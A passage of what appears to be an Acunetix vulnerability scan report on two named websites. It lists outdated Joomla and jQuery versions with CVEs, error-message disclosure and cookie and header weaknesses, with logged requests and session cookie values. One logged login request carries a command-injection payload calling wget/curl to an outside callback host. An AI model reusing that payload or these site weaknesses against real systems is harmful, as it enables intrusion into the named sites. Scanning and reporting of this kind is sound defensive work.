access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.27 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.28 or latest

References

https://developer.joomla.org/security-centre/858-20210703-core-lack-of-enforced-session-termination.html
(https://developer.joomla.org/security-centre/858-20210703-core-lack-of-enforced-session-termination.html)

CVE-2021-26037 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26037)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.27 are affected.


Request headers

175
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core SQL Injection (1.7.0 - 3.9.15)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latent vulnerabilities in the underlying database. Joomla! Core versions ranging from 1.7.0 and up to and
including 3.9.15 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.16 or latest

References

https://pentest.co.uk/labs/advisory/cve-2020-10243/ (https://pentest.co.uk/labs/advisory/cve-2020-10243/)

https://github.com/HoangKien1020/Joomla-SQLinjection (https://github.com/HoangKien1020/Joomla-SQLinjection)

https://developer.joomla.org/security-centre/807-20200306-core-sql-injection-in-featured-articles-menu-parameters.html
(https://developer.joomla.org/security-centre/807-20200306-core-sql-injection-in-featured-articles-menu-parameters.html)

CVE-2020-10243 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10243)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.7.0 and 3.9.15 are affected.


Request headers

176
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Application error messages

Severity Medium
Reported by module /Scripts/PerScheme/Error_Message.script

Description

This alert requires manual confirmation

Acunetix found one or more error/warning messages. Application error or warning messages may expose sensitive
information about an application's internal workings to an attacker.

These messages may also contain the location of the file that produced an unhandled exception.

Consult the 'Attack details' section for more information about the affected page(s).

Impact

Error messages may disclose sensitive information which can be used to escalate attacks.

Recommendation

Verify that these page(s) are disclosing error or warning messages and properly configure the application to log errors to a
file instead of displaying the error to the user.

References

PHP Runtime Configuration (https://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)

Improper Error Handling (https://www.owasp.org/index.php/Improper_Error_Handling)

Affected items

Web Server
Details
Application error messages:

https://www.sogbci.com/administrator/index.php

Unknown column 'Array' in 'where clause'

177
Request headers
POST /administrator/index.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: https://www.sogbci.com/

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Content-Length: 274

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive

71636bd32b93c53359e2fa6ccd6fa7b6=1&lang=en-GB&option=com_login&passwd=u]H[ww6KrA9F.x-
F&return=aW5kZXgucGhw&task=login&username[#this.getClass().forName('java.lang.Runtime').g
etRuntime().exec('wget+http://hitqhzwjzntur.bxss.me/||curl+http://hitqhzwjzntur.bxss.me/'
)]=pHqghUme


TLS/SSL certificate about to expire

Severity Low
Reported by module /Scripts/PerServer/SSL_Audit.script

Description

One of the TLS/SSL certificates used by your server is about to expire.

Once the certificate has expired, most web browsers will present end-users with a security warning, asking them to
manually confirm the authenticity of your certificate chain. Software or automated systems may silently refuse to connect to
the server.

This alert is not necessarily caused by the server (leaf) certificate, but may have been triggered by an intermediate
certificate. Please refer to the certificate serial number in the alert details to identify the affected certificate.

Impact

If an application server detects an expired certificate with a system it is communicating with, the application server may
continue processing data as if nothing happened, or the connection may be abruptly terminated.

Recommendation

Contact your Certificate Authority to renew the SSL certificate.

Affected items

178
Web Server
Details

The TLS/SSL certificate (serial: 048200f90e036a9de9bc5b47e3b958fd4d67) will expire in less than 60 days. The
certificate validity period is from Sun Jun 11 2023 16:30:00 GMT+0000 (Greenwich Standard Time) to Sat Sep 09
2023 16:29:59 GMT+0000 (Greenwich Standard Time) (47 days left)

Request headers


PHP Version Disclosure

Severity Informational
Reported by module /Scripts/PerServer/Version_Check.script

Description

The web server is sending the X-Powered-By: response headers, revealing the PHP version.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Recommendation

Configure your web server to prevent information leakage from its HTTP response.

References

PHP Documentation: header_remove() (https://www.php.net/manual/en/function.header-remove.php)

PHP Documentation: php.ini directive expose_php (https://www.php.net/manual/en/ini.core.php#ini.expose-php)

Affected items

Web Server
Details
Version detected: PHP/5.6.40.
Request headers

179
Scanned items (coverage report)
https://www.sogbci.com/

https://www.sogbci.com/contacts

180
Vulnerabilities
Scan details
Scan information
Start url https://nsiaassurances.ci
Host https://nsiaassurances.ci/

Threat level

Acunetix Threat Level 2

One or more medium-severity type vulnerabilities have been discovered by the scanner. You should investigate each of
these vulnerabilities to ensure they will not escalate to more severe problems.

Alerts distribution

Total alerts found 21


High 0
Medium 2
Low 5
Informational 14

181
Alerts summary


Vulnerable JavaScript libraries

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Base Score: 6.5

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 6.4

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-937
Affected items Variation
Web Server 2


Cookies with missing, inconsistent or contradictory properties

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

182
Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-284
Affected items Variation
Web Server 1

Cookies without HttpOnly flag set

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-1004
Affected items Variation
Web Server 1

Cookies without Secure flag set

Classification

183
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Base Score: 3.1

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 2.6

Access Vector: Network_accessible

Access Complexity: High

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-614
Affected items Variation
Web Server 1

Documentation files

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

184
CWE CWE-538
Affected items Variation
Web Server 1

Insecure Inline Frame (iframe)

Classification
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L

Base Score: 5.1

Attack Vector: Network

Attack Complexity: High

Privileges Required: High

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 4.6

Access Vector: Network_accessible

Access Complexity: High

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-829
Affected items Variation
/index.php/pt/node/13 1

Content Security Policy (CSP) not implemented

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

185
Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-1021
Affected items Variation
Web Server 1

Email addresses

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-200
Affected items Variation
Web Server 1

File uploads

Classification

186
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-16
Affected items Variation
Web Server 1

HTTP Strict Transport Security (HSTS) not following best practices

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

187
CWE CWE-16
Affected items Variation
Web Server 1

Internal IP address disclosure

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-200
Affected items Variation
Web Server 1

Javascript Source map detected

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

188
Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-16
Affected items Variation
Web Server 1

Outdated JavaScript libraries

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: High

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-937
Affected items Variation
Web Server 2

Permissions-Policy header not implemented

Classification

189
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-1021
Affected items Variation
Web Server 1

Reverse proxy detected

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

190
CWE CWE-16
Affected items Variation
Web Server 1

Subresource Integrity (SRI) not implemented

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-830
Affected items Variation
Web Server 1
/index.php/en/node/28 1
/node/22 1
/pt/node/22 1

191
Alerts details


Vulnerable JavaScript libraries

Severity Medium
Reported by module /httpdata/javascript_library_audit_external.js

Description

You are using one or more vulnerable JavaScript libraries. One or more vulnerabilities were reported for this version of the
library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities
that were reported.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

Affected items

Web Server
Details

jQuery 3.0.0
URL: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0/jquery.min.js
Detection method: The library's name and version were determined based on the file's CDN URI.
CVE-ID: CVE-2020-11022, CVE-2020-11023, CVE-2019-11358
Description: In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted
sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and
others) may execute untrusted code. This problem is patched in jQuery 3.5.0. / In jQuery versions greater than
or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources - even
after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may
execute untrusted code. This problem is patched in jQuery 3.5.0. / jQuery mishandles jQuery.extend(true, {},
...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__
property, it could extend the native Object.prototype.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/
https://www.cvedetails.com/cve/CVE-2020-11022/
https://github.com/advisories/GHSA-gxr4-xjj5-5px2
https://www.cvedetails.com/cve/CVE-2020-11023/
https://github.com/advisories/GHSA-jpcq-cgw6-v4j6
https://github.com/jquery/jquery/pull/4333
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
https://nvd.nist.gov/vuln/detail/CVE-2019-5428
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/

Request headers

192
GET /en/node/28?name=zFPWdwPk&optionDriver=1&subject=Souscription HTTP/1.1

Referer: https://nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive

Web Server
Details

jQuery 3.2.1
URL: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js
Detection method: The library's name and version were determined based on the file's CDN URI.
CVE-ID: CVE-2020-11022, CVE-2020-11023, CVE-2019-11358
Description: In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted
sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and
others) may execute untrusted code. This problem is patched in jQuery 3.5.0. / In jQuery versions greater than
or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources - even
after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may
execute untrusted code. This problem is patched in jQuery 3.5.0. / jQuery mishandles jQuery.extend(true, {},
...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__
property, it could extend the native Object.prototype.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/
https://www.cvedetails.com/cve/CVE-2020-11022/
https://github.com/advisories/GHSA-gxr4-xjj5-5px2
https://www.cvedetails.com/cve/CVE-2020-11023/
https://github.com/advisories/GHSA-jpcq-cgw6-v4j6
https://github.com/jquery/jquery/pull/4333
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
https://nvd.nist.gov/vuln/detail/CVE-2019-5428
https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/

Request headers

193
GET /pt/node/22 HTTP/1.1

Referer: https://nsiaassurances.ci/

Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD4RubqPc;
cookiesjsr=%7B%22base%22%3Afalse%2C%22analytics%22%3Afalse%2C%22facebook_pixel%22%3Afalse
%2C%22video%22%3Afalse%7D; big_pipe_nojs=1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: nsiaassurances.ci

Connection: Keep-alive


Cookies with missing, inconsistent or contradictory properties

Severity Low
Reported by module /RPA/Cookie_Validator.js

Description

At least one of the following cookies properties causes the cookie to be invalid or incompatible with either a different
property of the same cookie, of with the environment the cookie is being used in. Although this is not a vulnerability in itself,
it will likely lead to unexpected behavior by the application, which in turn may cause secondary security issues.

Impact

Cookies will not be stored, or submitted, by web browsers.

Recommendation

Ensure that the cookies configuration complies with the applicable standards.

References

MDN | Set-Cookie (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie)

Securing cookies with cookie prefixes (https://www.sjoerdlangkemper.nl/2017/02/09/cookie-prefixes/)

Cookies: HTTP State Management Mechanism (https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-05)

SameSite Updates - The Chromium Projects (https://www.chromium.org/updates/same-site)

draft-west-first-party-cookies-07: Same-site Cookies (https://tools.ietf.org/html/draft-west-first-party-cookies-07)

Affected items

Web Server
Verified vulnerability
Details
List of cookies with missing, inconsistent or contradictory properties:

194
https://nsiaassurances.ci/index.php/en/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/en/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/pt/node/13

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/en/node/19

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=Xj88ZLgeBOYP_oTu9DnDoaYkvbBjRMmUdl4Rb

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/fr/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

195
https://nsiaassurances.ci/index.php/en/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/cookies/documentation

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/pt/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/en/node/30

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/fr/user/login

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

196
https://nsiaassurances.ci/pt/user/register

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/pt/node/28

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/fr/node/13

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=udfgppTk4ECG7dBmdQ_i1DUjIsxh6hxxP9Bg

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

https://nsiaassurances.ci/index.php/user/register/

Cookie was set with:

Set-Cookie: SESS3fca59cf4d21053ced78977fbe56ca82=UZeYwX3H1UenHeYBwOiU7ntGOmByRNCipOKD

This cookie has the following issues:

